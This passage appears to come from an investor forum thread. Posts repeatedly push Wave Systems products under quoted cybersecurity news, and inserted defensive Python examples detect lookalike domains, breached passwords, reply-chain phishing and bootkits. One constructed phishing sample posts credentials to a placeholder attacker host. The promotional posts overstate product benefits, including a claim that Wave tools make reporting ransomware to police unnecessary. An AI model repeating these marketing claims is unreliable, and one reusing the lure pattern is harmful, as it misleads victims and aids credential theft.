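MULTI_LABEL_SUFFIXES = {"ac.uk", "co.uk", "edu.au", "edu.sg", "edu.co", "ac.nz"}


def split_domain(fqdn: str) -> tuple[str, str]:
    """Return (registrable_label, public_suffix).

    'sso.gcu.ac.uk' -> ('gcu', 'ac.uk'); 'login.unt.edu' -> ('unt', 'edu').
    Labels left of the registrable one are dropped: once an attacker owns the
    registrable domain they can mint any subdomain under it.
    """
    labels = fqdn.strip().lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return labels[-3], ".".join(labels[-2:])
    if len(labels) >= 2:
        return labels[-2], labels[-1]
    raise ValueError(f"not a registrable domain: {fqdn!r}")


def index_protected(protected: list[str]) -> dict[str, set[str]]:
    """Map each protected label to the suffixes the organisation really uses."""
    index: dict[str, set[str]] = {}
    for domain in protected:
        label, suffix = split_domain(domain)
        index.setdefault(label, set()).add(suffix)
    return index


def find_tld_swaps(protected: list[str], observed: list[str]) -> list[tuple[str, str, list[str]]]:
    """Return (observed_domain, protected_label, legitimate_suffixes) for each
    observed domain that reuses a protected label under a foreign suffix."""
    index = index_protected(protected)
    hits = []
    for domain in observed:
        try:
            label, suffix = split_domain(domain)
        except ValueError:
            continue
        if label in index and suffix not in index[label]:
            hits.append((domain.strip().lower(), label, sorted(index[label])))
    return hits


def defensive_registrations(protected: list[str], tlds: list[str]) -> list[str]:
    """Variants to register, or at least to watch in passive DNS and CT logs."""
    variants = set()
    for domain in protected:
        label, suffix = split_domain(domain)
        variants.update(f"{label}.{tld}" for tld in tlds if tld != suffix)
    return sorted(variants)


# Constructed sample data: protected university domains and a feed of newly
# observed domains mixing legitimate hosts with lookalikes.
PROTECTED = ["gcu.ac.uk", "unt.edu", "kcl.ac.uk"]
OBSERVED = [
    "gcu.ac.uk", "sso.gcu.ac.uk",   # legitimate
    "gcu.me", "login.gcu.co.uk",    # label kept, suffix swapped
    "unt.edu.co",                   # 'unt' under edu.co instead of edu
    "kcl-ac.uk",                    # hyphen-joined variant: not a TLD swap, NOT caught here
]

if __name__ == "__main__":
    for domain, label, legit in find_tld_swaps(PROTECTED, OBSERVED):
        print(f"{domain}: reuses '{label}', which we only hold under {legit}")
    print(defensive_registrations(["unt.edu"], ["edu", "com", "org", "edu.co"]))
```

Note the last observed entry: a hyphen-joined variant such as `kcl-ac.uk` is a different registrable label and slips past a pure TLD-swap check, so this belongs alongside, not instead of, a typosquat/homoglyph check.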
PwC 3200+ businesses and IT leaders share their views on what's changing and what's next in cybersecurity
PwC Twitter tweet Oct. 8.
==================================================================
The TPM is marching on, as Methinks showed with Infineon. And this PwC cybersecurity report from 3200+ businesses at first glance shows no mention of hardware security or the TPM. What is remarkable is that 10 years ago, and for a period of time, PwC successfully used Wave software and the TPM in their 2FA. Wave VSC 2.0 was an improvement, and organizations are able to set it up much faster than the PwC installation. It seems that, with this success at such a large and important company, Infineon's continued success, and a large global financial services company using TPMs, hardware security and Wave or its partners should be helping a lot more organizations with Wave solutions.
==================================================================
wavesys.com
==================================================================
Wave solutions, better security!!!
Iran acknowledges cyberattacks on government departments
https://abcnews.go.com/International/wireStory/iran-acknowledges-cyberattacks-government-departments-73626268
=================================================================
Are governments prepared for Iran or other countries defensively? Using Trusted Computing and Wave solutions now could help governments' cyber defenses tremendously!!
=================================================================
wavesys.com
=================================================================
Wave solutions, better security!!!
President Trump Can’t Use $3.6 Billion in Military Funds for Border Wall Construction, Federal Court Rules
https://www.govexec.com/oversight/2020/10/president-trump-cant-use-36-billion-military-funds-border-wall-construction-federal-court-rules/169193/
==================================================================
Emergency funds at this point should be earmarked for cybersecurity/trusted computing!! Wave has better security, and these funds could go a long way in shoring up the government's cyber defenses!! What else is working really effectively like Wave solutions could? It only takes one threat to get through to potentially lose many gigabytes of important data!!! By not allowing unauthorized (unknown and unapproved) devices on the network, Wave solutions don't allow unauthorized threats on the network.
==================================================================
wavesys.com
==================================================================
Wave solutions, better security!!!
Carnival Corp. Confirms Personal Information Compromised in Ransomware Incident
https://www.securityweek.com/carnival-corp-confirms-personal-information-compromised-ransomware-incident
==================================================================
'IT ensuring that only known and approved devices are accessing your network' comes with certain Wave solutions, and would be very helpful to Carnival which found that someone had unauthorized access to personal data. Thus unauthorized (unknown and unapproved) devices wouldn't have access to the Carnival network by using Wave solutions.
==================================================================
wavesys.com
==================================================================
Wave solutions, better security!!!
German tech giant Software AG down after ransomware attack
https://www.zdnet.com/article/german-tech-giant-software-ag-down-after-ransomware-attack/
Exclusive: The Clop ransomware gang is demanding more than $20 million from German tech firm Software AG.
Software AG, one of the largest software companies in the world, has suffered a ransomware attack over the last weekend, and the company has not yet fully recovered from the incident.
A ransomware gang going by the name of "Clop" breached the company's internal network on Saturday, October 3, encrypted files, and asked for more than $20 million to provide the decryption key.
Earlier today, after negotiations failed, the Clop gang published screenshots of the company's data on a website the hackers operate on the dark web (a so-called leak site).
The screenshots show employee passport and ID scans, employee emails, financial documents, and directories from the company's internal network.
Software AG disclosed the incident on Monday when it revealed it was facing disruptions on its internal network "due to [a] malware attack."
The company said that services to customers, including its cloud-based services, remained unaffected and that it was not aware "of any customer information being accessed by the malware attack." This statement was recanted in a later press release two days later, when Software AG admitted to finding evidence of data theft.
The message about the attack remained on its official website homepage all week, including today.
Software AG did not return phone calls today for additional details or comments about the incident.
A copy of the ransomware binary used against Software AG was discovered earlier this week by security researcher MalwareHunterTeam. The $20+ million ransom demand is one of the largest ransom demands ever requested in a ransomware attack.
The ID provided in this ransom note allows security researchers to view the online chats between the Clop gang and Software AG on a web portal managed by the ransomware group. At the time of writing, there is no evidence the German company paid the ransom demand.
Software AG is Germany's second-largest company with more than 10,000 enterprise customers across 70 countries. Some of the company's most recognizable customers include Fujitsu, Telefonica, Vodafone, DHL, and Airbus.
Its product line includes business infrastructure software such as database systems, enterprise service bus (ESB) frameworks, software architecture (SOA), and business process management systems (BPMS).
==================================================================
Many organizations could have been tremendously helped by Wave when it comes to ransomware! data breaches! phishing! malware! unauthorized access! Organizations could find that they have underestimated the capabilities of Wave when it comes to these cyber issues!!! A small company like Wave can have surprisingly positive results that are much better than the current results in the marketplace. Why should the market continue to suffer with the status quo?
==================================================================
wavesys.com
==================================================================
Wave solutions, better security!!!
Boards Increase Investment in Cybersecurity in Face of Threats and Regulatory Fines
https://www.infosecurity-magazine.com/news/boards-increase-investment-fines/
Board decisions on cybersecurity spending are slowly improving following the impact of regulatory fines and COVID-19.
According to research by Thycotic surveying 908 senior IT security decision makers working within organizations with more than 500 employees, 58% plan to add more security budget in the next 12 months.
Amid growing cyber threats and rising risks through the COVID crisis, CISOs report that boards are listening and stepping up with increased budget for cybersecurity, with 91% agreeing that their board adequately supports them with investment.
In an email to Infosecurity, Joseph Carson, chief security scientist at Thycotic, said he believed the retro-fixing of security to remote working tools was “a path and direction most organizations have been going down, however it was always a lower priority.”
He claimed COVID-19 has accelerated the investment into both cloud and remote working budgets, and this includes the need for secure remote access and the ability to access from any location. “Having a CISO on the board is helping ensure technology that supports remote working environments are also secure by design,” he said.
Terence Jackson, CISO for Thycotic, said while boards are definitely listening and stepping up with increased budget for cybersecurity, they tend to view any investment as a cost rather than adding business value. “However, there is still some way to go,” he continued. “The fact boards mainly approve investments after a security incident or through fear of regulatory penalties for non-compliance shows that cybersecurity investment decisions are more about insurance than about any desire to lead the field which, in the long run, limits the industry’s ability to keep pace with the cyber-criminals.”
The research also showed that 77% of respondents have received boardroom investment for new security projects either in response to a cyber incident in their organization (49%), or through fear of audit failure (28%).
Asked if the fear of regulatory fines is an effective way to win budgets, Carson said: “It really depends on how the risk of compliance fines are communicated to the board. If it is done in a way that shows the financial exposure, it highlights a real business risk that must be reduced. The CISO needs to be able to speak the same language as the board and compliance exposure is a way that the CISO can effectively show tangible financial risks.”
However, 37% of participants’ proposed investments were turned down because the threat was perceived as low risk, or because the technology had a lack of demonstrable ROI. One-third (33%) believe senior management does not comprehend the scale of threat when making cybersecurity investment decisions.
Asked if this is proof that boards are able to understand cybersecurity if they are able to determine risk levels, Carson said he believed boards are improving at understanding risks, however this can also be related to the problem that security teams struggle to relate those security investment into business risk or how it helps the business ROI.
“The main area for security improvement is always going to be how to convey business ROI from security investments and all security teams need a business financial risk analyst who can convert security risk into business risk,” he said.
=================================================================
With all the continuous billions of dollars in cyber damage being done to economies around the World, isn't it time for organizations to go with cybersecurity that works effectively and efficiently - Wave solutions!!!
==================================================================
wavesys.com
=================================================================
Wave solutions, better security!!!
HEH P2P Botnet Sports Dangerous Wiper Function
https://threatpost.com/heh-p2p-botnet-wiper-function/159974/
=================================================================
Excerpt:
Users can protect themselves by making sure Telnet ports 23/2323 aren't open to the public internet, and by ensuring strong passwords on devices.
=================================================================
One could go the strong password route or go on the simpler and more secure path of using Wave VSC 2.0!! This is where the TPM and PIN are needed by the botnet and the botnet would have a much more difficult time in getting those. There wouldn't be complicated passwords to forget or lose! This is a WIPER!!! Use better security in Wave VSC 2.0!!
==================================================================
wavesys.com
==================================================================
Wave solutions, better security!!!
3 Ways Companies are Working on Security by Design
https://www.darkreading.com/application-security/3-ways-companies-are-working-on-security-by-design/d/d-id/1339111
==================================================================
I'm really surprised that after 10+ years of developing the TPM and its proven capability that the TPM is not in the conversation of the above article. Or that it doesn't show up on the Cybersecurity Awareness Month website. Here, cybersecurity in the World is lacking big time, and the activated TPM should be promoted at this site. Why would it not be when there are many billions of dollars in cyber damage being done to World economies???
==================================================================
wavesys.com
==================================================================
Wave solutions, better security!!!
Corporate Credentials on the Dark Web Up by 429% This Year
https://www.infosecurity-magazine.com/news/corporate-credentials-dark-web/
There has been a 429% growth in the number of corporate credentials with plaintext passwords on the dark web so far this year, according to Arctic Wolf’s 2020 Security Operations Annual Report. This amounts to an average of 17 separate sets of credentials per typical organization, leaving businesses particularly vulnerable to account takeover attacks (ATO).
This is despite a year-on-year decline in publicly disclosed data breaches, which Arctic Wolf attributes to “alert fatigue”, in which overworked IT and security professionals increase alert thresholds, leading to less reporting of incidents.
The study also found there was a 64% rise in phishing and ransomware attempts in Q2 of 2020 compared to Q1, with cyber-actors seeking to use the topic of COVID-19 as a lure as well as target remote workers. The banking sector experienced the biggest increase in these types of attacks, at 520%.
Additionally, since the start of the COVID-19 pandemic in March, critical vulnerability patch time has gone up by 40 days, which the authors said was driven by higher common vulnerabilities and exposures (CVE) volumes, more critical CVEs and the shift to remote workforces. Another major security concern is that there has been a 240% increase in unsecured Wi-Fi usage since March due to the emergence of home working.
The need for organizations to closely monitor their network, endpoint and cloud environments at all times was underscored by the finding that 35% of high risk incidents observed by Arctic Wolf took place between the hours of 8.00pm and 8.00am while 14% occurred on weekends, when many in-house security teams are not online.
Mark Manglicmot, vice-president, security services, Arctic Wolf, commented: “The cybersecurity industry has an effectiveness problem. Every year new technologies, vendors, and solutions emerge. Yet, despite this constant innovation, we continue to see breaches in the headlines. The only way to eliminate cybersecurity challenges like ransomware, account takeover attacks, and cloud misconfigurations is by embracing security operations capabilities that fully integrate people, processes, and technology.”
==================================================================
All it takes is one set of corporate credentials in an attacker's hands to do serious damage to a corporation. Wave could be protecting these corporations and stopping the damage from happening with Wave VSC 2.0 and Wave ERAS.
==================================================================
wavesys.com
==================================================================
Wave solutions, better security!!!
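The Arctic Wolf figures above are about plaintext corporate passwords already circulating, which is exactly what account-takeover attacks reuse. One control a practitioner reaches for is to refuse any password that is already in a breach corpus, checked at set/reset time without ever sending the password itself. The block below is an added example, not code from Arctic Wolf or the article: it implements the k-anonymity range query used by Have I Been Pwned's Pwned Passwords service (only the first five hex characters of the SHA-1 leave the machine; the suffix is matched locally). The live fetcher targets the real `api.pwnedpasswords.com/range/` endpoint but is not called here; the offline demo uses a constructed corpus with made-up counts.

```python
"""Check whether a password appears in a breach corpus without revealing it,
using the k-anonymity range query of HIBP's Pwned Passwords. Added example;
not code from Arctic Wolf or the article. FAKE_CORPUS and its counts are
constructed so the demo runs offline."""
import hashlib
import urllib.request
from typing import Callable, Dict, Iterable, List, Tuple

RANGE_URL = "https://api.pwnedpasswords.com/range/"


def sha1_prefix_suffix(password: str) -> Tuple[str, str]:
    """Split the upper-case hex SHA-1 into the 5-char prefix that is sent
    over the wire and the 35-char suffix that is matched locally."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def parse_range_response(body: str) -> Dict[str, int]:
    """Parse 'SUFFIX:COUNT' lines into a suffix -> count map."""
    counts: Dict[str, int] = {}
    for line in body.splitlines():
        line = line.strip()
        if not line:
            continue
        suffix, _, count = line.partition(":")
        counts[suffix.upper()] = int(count)
    return counts


def exposure_count(password: str, fetch_range: Callable[[str], str]) -> int:
    """Occurrences of the password in the corpus; 0 means not found.
    Padded entries from the live API carry count 0 and so report 'not found'."""
    prefix, suffix = sha1_prefix_suffix(password)
    return parse_range_response(fetch_range(prefix)).get(suffix, 0)


def screen_credentials(creds: Iterable[Tuple[str, str]],
                       fetch_range: Callable[[str], str]) -> List[Tuple[str, int]]:
    """Return (username, count) for every credential whose password is exposed.
    Suitable for a password-set hook or an audit of a recovered dump."""
    exposed = []
    for user, pw in creds:
        n = exposure_count(pw, fetch_range)
        if n > 0:
            exposed.append((user, n))
    return exposed


def live_range_fetcher(prefix: str) -> str:
    """Query the real range endpoint (needs network; unused by the demo).
    'Add-Padding' makes every response a similar size so response length
    does not leak which prefix bucket was asked for."""
    req = urllib.request.Request(RANGE_URL + prefix, headers={"Add-Padding": "true"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8")


# Constructed stand-in corpus; the counts are invented for the example.
FAKE_CORPUS = {"password": 1200, "Summer2020!": 37, "letmein": 512}


def fake_range_fetcher(prefix: str) -> str:
    """Offline stand-in returning every corpus hash that shares the prefix,
    plus one decoy line, in the live API's 'SUFFIX:COUNT' format."""
    lines = ["F" * 35 + ":1"]          # decoy so a bucket is never empty
    for pw, count in FAKE_CORPUS.items():
        p, s = sha1_prefix_suffix(pw)
        if p == prefix:
            lines.append(f"{s}:{count}")
    return "\r\n".join(lines)


if __name__ == "__main__":
    for user, n in screen_credentials([("alice", "letmein"), ("bob", "unique-passphrase-9f3k")],
                                      fake_range_fetcher):
        print(f"{user}: password seen {n} times in breach data, reject it")
```

Swap `fake_range_fetcher` for `live_range_fetcher` to query the real service; the prefix alone identifies roughly one in a million buckets, so the service learns nothing usable about the password, and a user whose password is already in a dump is told so before an attacker can replay it.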
Ransomware threat surge, Ryuk attacks about 20 orgs per week
https://www.bleepingcomputer.com/news/security/ransomware-threat-surge-ryuk-attacks-about-20-orgs-per-week/
==================================================================
There was an important job(s) to be done and Everybody was sure that Somebody would do it. Anybody could have done it, but Nobody did it.
==================================================================
wavesys.com
==================================================================
Wave solutions, better security.
TCG Executive Director Stephanie Schultz Wins a 2020 Public Relations and Marketing Excellence Award
October 2020 by Marc Jacob
https://www.globalsecuritymag.com/TCG-Executive-Director-Stephanie,20201006,103522.html
The Business Intelligence Group announced that Stephanie Schultz, Executive Director of Trusted Computing Group (TCG) has today won the Marketing Executive of the Year award at the 2020 Public Relations and Marketing Excellence Awards.
TCG is a not-for-profit organization formed to develop, define and promote open, vendor-neutral, global industry specifications and standards. Its standards have been deployed worldwide to protect against cyberattacks for today and beyond. This award recognises Stephanie’s achievements in leading TCG’s marketing strategy and corporate vision to prepare TCG for the cybersecurity challenges ahead.
==================================================================
It's interesting that with some 2,000,000,000 TPMs in the marketplace, and with the maturation and proven capability of the TPM, they aren't all activated by now given the MANY security incidents that have occurred over the last several years. Why isn't the TPM really being used when the market really needs them to be activated? Wave could help in a BIG WAY!!
Congrats, Stephanie.
==================================================================
wavesys.com
==================================================================
Wave solutions, better security!!
This new "linkless" phishing scam is even tricking tech experts
https://flipboard.com/topic/cybersecurity/this-new-linkless-phishing-scam-is-even-tricking-tech-experts/a-AIOlHKwlQFqaULhchOU6tg%3Aa%3A3642466-201ed23c85%2Ftechradar.com
The cybersecurity firm Sophos has observed two new phishing campaigns in the wild that use a new trick to help them avoid detection. Email phishing...
==================================================================
When the contents of this article are combined with post 246139, there could be a dangerous combination of phishing happening: receiving HTML attachments from phishing emails that are sent as replies to genuine emails. Don't take a chance with this potentially dangerous phishing combination.
Use Wave solutions, better security!!!
==================================================================
wavesys.com
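The combination the post above warns about (an HTML attachment arriving on a message that is dressed up as a reply to a genuine thread) is easy to express as a mail-gateway rule. The following is an added example, not code from Sophos or the article: it parses an RFC 5322 message with the standard library, looks for attachments that are HTML by declared type or by file extension, checks whether the subject looks like a reply, and notes when a "reply" carries no `In-Reply-To`/`References` headers, which real mail clients always add. The verdict thresholds and the three sample messages are constructed for illustration.

```python
"""Flag mail that poses as a reply to an existing thread but carries an HTML
attachment. Added example; not code from Sophos or the article. Heuristics
and sample messages are constructed; tune the verdicts to your own mail flow."""
import email
import re
from email import policy
from email.message import EmailMessage
from typing import Dict, List

HTML_EXTENSIONS = (".html", ".htm", ".shtml", ".xhtml")
REPLY_SUBJECT = re.compile(r"^\s*(re|aw|sv)\s*:", re.IGNORECASE)


def html_attachments(msg: EmailMessage) -> List[str]:
    """Names of attached parts that are HTML by declared type or extension."""
    names = []
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").strip()
        if part.get_content_type() == "text/html" or name.lower().endswith(HTML_EXTENSIONS):
            names.append(name or "<unnamed text/html part>")
    return names


def analyse(raw: str) -> Dict[str, object]:
    """Return the signals and a verdict for one raw message."""
    msg = email.message_from_string(raw, policy=policy.default)
    subject = str(msg.get("Subject", "") or "")
    looks_like_reply = bool(REPLY_SUBJECT.match(subject))
    # A genuine reply from a real client carries In-Reply-To/References; a
    # 'reply' without them was most likely built by a kit reusing a stolen
    # subject line rather than sent from the hijacked thread itself.
    threaded = bool(msg.get("In-Reply-To") or msg.get("References"))
    attachments = html_attachments(msg)

    if attachments and looks_like_reply:
        verdict = "block"     # reply-chain lure plus HTML attachment
    elif attachments:
        verdict = "review"    # an HTML attachment alone still deserves a look
    else:
        verdict = "ok"
    return {
        "subject": subject,
        "looks_like_reply": looks_like_reply,
        "missing_thread_headers": looks_like_reply and not threaded,
        "html_attachments": attachments,
        "verdict": verdict,
    }


def build_sample(subject: str, in_reply_to: str = "", attach_html: bool = False) -> str:
    """Construct a sample message (not a captured one) for the demo and tests."""
    msg = EmailMessage()
    msg["From"] = "accounts@supplier.example"
    msg["To"] = "ap@victim.example"
    msg["Subject"] = subject
    if in_reply_to:
        msg["In-Reply-To"] = in_reply_to
    msg.set_content("Hi, the revised invoice is attached. Regards")
    if attach_html:
        # Typical lure: a local HTML page whose form posts harvested credentials
        # to a server the attacker controls (placeholder host below).
        msg.add_attachment("<html><body><form action='https://collector.invalid/post'>"
                           "</form></body></html>",
                           subtype="html", filename="Invoice_1042.html")
    return msg.as_string()


LURE = build_sample("RE: Invoice 1042", attach_html=True)
GENUINE_REPLY = build_sample("RE: Invoice 1042", in_reply_to="<a1b2c3@supplier.example>")
COLD_HTML = build_sample("Invoice 1042", attach_html=True)

if __name__ == "__main__":
    for label, raw in (("lure", LURE), ("genuine reply", GENUINE_REPLY), ("cold html", COLD_HTML)):
        print(label, analyse(raw))
```

The `missing_thread_headers` signal is reported separately rather than folded into the verdict because some ticketing systems also drop threading headers; decide per environment whether it should escalate "review" to "block".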
Custom-made UEFI bootkit found lurking in the wild
https://arstechnica.com/information-technology/2020/10/custom-made-uefi-bootkit-found-lurking-in-the-wild/
Attackers are going to great lengths to gain the highest level of persistence.
==================================================================
An activated TPM being used with Wave Endpoint Monitor could accomplish better things for organizations' computers!!! A lot of organizations should be using Wave solutions with activated TPMs!! It could help the situation in the above article!!
==================================================================
wavesys.com
==================================================================
Nice post Methinks!
Wave solutions, better security!!!
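The bootkit article above is about persistence in firmware, and the post's answer is an activated TPM with an endpoint monitor. What such a monitor actually checks is shown below as an added example, not Wave's or the article's code: a measured-boot event log is replayed into simulated SHA-256 PCRs with the TPM's extend operation, the result is compared with what the TPM quoted (proving the log was not edited) and with an enrolled baseline (showing which boot stage changed). The boot components and event list are constructed; on a real host the events would be parsed from the TCG event log (on Linux, `/sys/kernel/security/tpm0/binary_bios_measurements`) and the quoted PCRs taken from a `TPM2_Quote`, neither of which is parsed here.

```python
"""Replay a measured-boot event log into simulated SHA-256 PCRs and compare
with a TPM quote and a golden baseline. Added example; not Wave's or the
article's code. Boot components and events are constructed."""
import hashlib
from typing import Dict, List, Tuple

Event = Tuple[int, str, bytes]   # (PCR index, event description, SHA-256 digest)


def measure(blob: bytes) -> bytes:
    """Digest the firmware records for a component before running it."""
    return hashlib.sha256(blob).digest()


def extend(pcr: bytes, digest: bytes) -> bytes:
    """TPM2_PCR_Extend: PCR_new = H(PCR_old || digest). One-way and
    order-dependent, so software cannot 'unextend' or reorder later."""
    return hashlib.sha256(pcr + digest).digest()


def replay(events: List[Event]) -> Dict[int, bytes]:
    """Fold the log into per-PCR values from the all-zero value that
    PCRs 0..16 hold after a TPM reset."""
    pcrs: Dict[int, bytes] = {}
    for index, _desc, digest in events:
        pcrs[index] = extend(pcrs.get(index, bytes(32)), digest)
    return pcrs


def boot_events(firmware: bytes, secure_boot_policy: bytes, bootloader: bytes) -> List[Event]:
    """A minimal boot sequence using the standard PCR assignments
    (PCR0 firmware code, PCR7 Secure Boot policy, PCR4 boot manager)."""
    return [
        (0, "EV_POST_CODE: firmware volume", measure(firmware)),
        (7, "EV_EFI_VARIABLE_DRIVER_CONFIG: SecureBoot/PK/KEK/db", measure(secure_boot_policy)),
        (4, "EV_EFI_BOOT_SERVICES_APPLICATION: OS boot manager", measure(bootloader)),
    ]


def verify_boot(events: List[Event], quoted: Dict[int, bytes],
                golden: Dict[int, bytes]) -> Dict[str, object]:
    """Two independent checks:
    log_consistent: the log replays to exactly what the TPM quoted, so the
                    log was not edited after the fact;
    changed_pcrs:   PCRs that differ from the enrolled baseline, i.e. which
                    boot stage was modified."""
    replayed = replay(events)
    log_consistent = all(replayed.get(i) == v for i, v in quoted.items())
    changed = sorted(i for i, v in golden.items() if replayed.get(i) != v)
    return {"log_consistent": log_consistent, "changed_pcrs": changed}


# Constructed boot components standing in for real binaries.
FIRMWARE = b"OEM UEFI firmware volume 1.0"
SECURE_BOOT = b"SecureBoot=1;PK=OEM;db=MS-UEFI-CA"
BOOTLOADER = b"bootmgfw.efi"
IMPLANT = b"malicious DXE driver appended to the volume"

CLEAN_EVENTS = boot_events(FIRMWARE, SECURE_BOOT, BOOTLOADER)
TAMPERED_EVENTS = boot_events(FIRMWARE + IMPLANT, SECURE_BOOT, BOOTLOADER)
GOLDEN = replay(CLEAN_EVENTS)     # enrolled from a known-good boot

if __name__ == "__main__":
    # Honest quote after the implant: PCR0 moves, the log is still consistent.
    print(verify_boot(TAMPERED_EVENTS, replay(TAMPERED_EVENTS), GOLDEN))
    # The implant hands us the clean log, but the TPM quoted the real boot.
    print(verify_boot(CLEAN_EVENTS, replay(TAMPERED_EVENTS), GOLDEN))
```

The caveat a practitioner wants: this detects an implant only if the code that performs the first measurement (the CRTM) is itself intact and the quote is signed by the TPM's attestation key and checked off-host. An implant that controls the earliest boot code can measure a clean image of itself, which is why vendors pair measured boot with a hardware root such as Intel Boot Guard or a DRTM launch.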
Ransomware victims aren't reporting attacks to police. That's causing a big problem
https://www.zdnet.com/article/ransomware-victims-arent-reporting-attacks-to-police-thats-causing-a-big-problem/
Europol's annual cyber crime report says ransomware is under-reported by victims - some of which appear to be simply hoping that nobody finds out they were a victim.
Many victims of ransomware aren't reporting attacks to police, making it harder to measure the level of crime and to tackle the gangs involved.
Europol's Internet Organised Crime Threat Assessment 2020 report details the key forms of cyber crime which pose a threat to businesses right now and ransomware remains one of the main concerns, especially as these gangs increasingly display high levels of skill and sophistication.
In many cases, ransomware gangs don't just encrypt the network with malware and demand hundreds of thousands or millions of dollars in bitcoin, they'll also threaten to leak stolen sensitive corporate files or personal data if they don't receive a payment.
And while ransomware is one of the most high profile forms of cyber attack, Europol's report warns that it remains an under-reported crime as many organisations still aren't coming forward to law enforcement after falling victim.
Several law enforcement agencies across Europe say they've only heard of ransomware cases via reports in local media.
The report suggests that approaching police to start a criminal investigation was "not generally a priority" for victims, who are more concerned with maintaining business continuity and limiting reputational damage. For some, the idea of getting law enforcement involved could be seen as a risk to their reputation.
That's why some businesses are choosing to engage with what Europol describes as "private sector security firms" to investigate attacks or negotiate ransom payments, instead of approaching the authorities.
Companies do this so evidence of the attack and their response to it can remain outside the public eye, especially given how law enforcement agencies recommend that organisations should never give into the demands of cyber criminals. But many businesses still view paying the ransom as the quickest and easiest way of restoring operations, even if cyber criminal groups can't always be trusted to keep their word.
And on top of the moral quandaries when it comes to dealing with cyber criminals or private negotiators, police warn that not reporting ransomware attacks is detrimental to others.
"By using such companies, victims will not file an official complaint, which increases the lack of visibility and awareness concerning real figures of ransomware attacks among law enforcement," says the Europol paper.
"Not reporting cases to law enforcement agencies will obviously hamper any efforts, as important evidence and intelligence from different cases can be missed".
But it isn't just businesses which were actively attempting to avoid publicity which don't report ransomware attacks; the report notes that some victims just don't think that law enforcement is able to do anything to help.
However, the report adds that investigating every attack possible helps the authorities build up a better picture of the ransomware landscape and how to potentially prevent attacks or aid organisations which fall victim.
For example, Europol's No More Ransom portal provides free decryption keys for various families of ransomware. The keys are provided by both cybersecurity companies and law enforcement agencies which have been able to break the encryption following investigation of the ransomware. If organisations don't report ransomware attacks, it could prevent other victims from being able to use free tools like this.
==================================================================
For solutions that protect against ransomware, please see post 246140. This could avoid having to call the police altogether.
==================================================================
wavesys.com
==================================================================
Wave solutions, better security!!!
Clinical Trials Hit by Ransomware Attack on Health Tech Firm
https://www.nytimes.com/2020/10/03/technology/clinical-trials-ransomware-attack-drugmakers.html
==================================================================
No patients were affected, but the incident was another reminder of the risks in the increasingly common assaults on computer networks.
A Philadelphia company that sells software used in hundreds of clinical trials, including the crash effort to develop tests, treatments and a vaccine for the coronavirus, was hit by a ransomware attack that has slowed some of those trials over the past two weeks.
The attack on eResearchTechnology, which has not previously been reported, began two weeks ago when employees discovered that they were locked out of their data by ransomware, an attack that holds victims’ data hostage until they pay to unlock it. ERT said clinical trial patients were never at risk, but customers said the attack forced trial researchers to track their patients with pen and paper.
Among those hit were IQVIA, the contract research organization helping manage AstraZeneca’s Covid vaccine trial, and Bristol Myers Squibb, the drugmaker leading a consortium of companies to develop a quick test for the virus.
ERT has not said how many clinical trials were affected, but its software is used in drug trials across Europe, Asia and North America. It was used in three-quarters of trials that led to drug approvals by the Food and Drug Administration last year, according to its website.
On Friday, Drew Bustos, ERT’s vice president of marketing, confirmed that ransomware had seized its systems on Sept. 20. As a precaution, Mr. Bustos said, the company took its systems offline that day, called in outside cybersecurity experts and notified the Federal Bureau of Investigation.
“Nobody feels great about these experiences, but this has been contained,” Mr. Bustos said. He added that ERT was starting to bring its systems back online on Friday and planned to bring remaining systems online over the coming days.
Mr. Bustos said it was still too early to say who was behind the attack. He declined to say whether the company paid its extortionists, as so many companies hit by ransomware now do.
The attack on ERT follows another major ransomware attack last weekend on Universal Health Services, a major hospital chain with more than 400 locations, many in the United States.
NBC News first reported the attack on UHS on Monday, and said it appeared to be “one of the largest medical cyberattacks in United States history.”
The incidents followed more than a thousand ransomware attacks on American cities, counties and hospitals over the past 18 months. The attacks, once treated as a nuisance, have taken on greater urgency in recent weeks as American officials worry they may interfere, directly or indirectly, with the November election.
A ransomware attack in Germany resulted in the first known death from a cyberattack in recent weeks, after Russian hackers seized 30 servers at University Hospital Düsseldorf, crashing systems and forcing the hospital to turn away emergency patients. As a result, the German authorities said, a woman in a life-threatening condition was sent to a hospital 20 miles away in Wuppertal and died from treatment delays.
One of ERT’s clients, IQVIA, said it had been able to limit problems because it had backed up its data. Bristol Myers Squibb also said the impact of the attack had been limited, but other ERT customers had to move their clinical trials to pen and paper.
In a statement, IQVIA said the attack had “had limited impact on our clinical trials operations,” and added, “We are not aware of any confidential data or patient information, related to our clinical trial activities, that have been removed, compromised or stolen.”
Pfizer and Johnson & Johnson, two companies working on a coronavirus vaccine, said their coronavirus vaccine trials had not been affected.
“ERT is not a technology provider for or otherwise involved in Pfizer’s Phase 1/2/3 Covid-19 vaccine clinical trials,” Amy Rose, a spokeswoman for Pfizer, said.
Companies and research labs on the front lines of the pandemic have been repeat targets for foreign hackers over the past seven months, as countries around the world try to gauge one another’s responses and progress in addressing the virus. In May, the F.B.I. and the Department of Homeland Security warned that Chinese government spies were actively trying to steal American clinical research through cybertheft.
“Health care, pharmaceutical and research sectors working on Covid-19 response should all be aware they are the prime targets of this activity and take the necessary steps to protect their systems,” the agencies said.
More than a dozen countries have redeployed military and intelligence hackers to glean what they can about other nations’ responses, according to security researchers.
Even countries that previously did not stand out for their cyber prowess, like South Korea and Vietnam, have been named in recent security reports as countries that are engaged in hacking global health organizations in the pandemic.
=================================================================
wavesys.com
=================================================================
Wave solutions, better security, Wave solutions, better security!!
Security pros face sanctions if they help ransomware victims pay
https://www.computerweekly.com/news/252490013/Security-pros-face-sanctions-if-they-help-ransomware-victims-pay
New advisory from the US government warns cyber insurance and incident response specialists that they could be skating on thin ice if they help ransomware victims pay their attackers off.
==================================================================
Three protections that organizations exposed to ransomware wished they had:
1. Detect sneaky malware (i.e., ransomware) with Wave Endpoint Monitor.
2. Keep the attackers off the network with Wave VSC 2.0 and Wave ERAS.
3. Use Wave SED management to manage SEDs and protect computers.
=================================================================
If organizations facing these problems knew about these three protections for ransomware and also what else Wave can do, there should be a long line at Wave's door.
=================================================================
wavesys.com
=================================================================
What works is better security, Wave solutions!!!
This worm phishing campaign is a game-changer in password theft, account takeovers
https://www.zdnet.com/article/this-worm-phishing-campaign-is-a-game-changer-in-password-theft-account-takeovers/
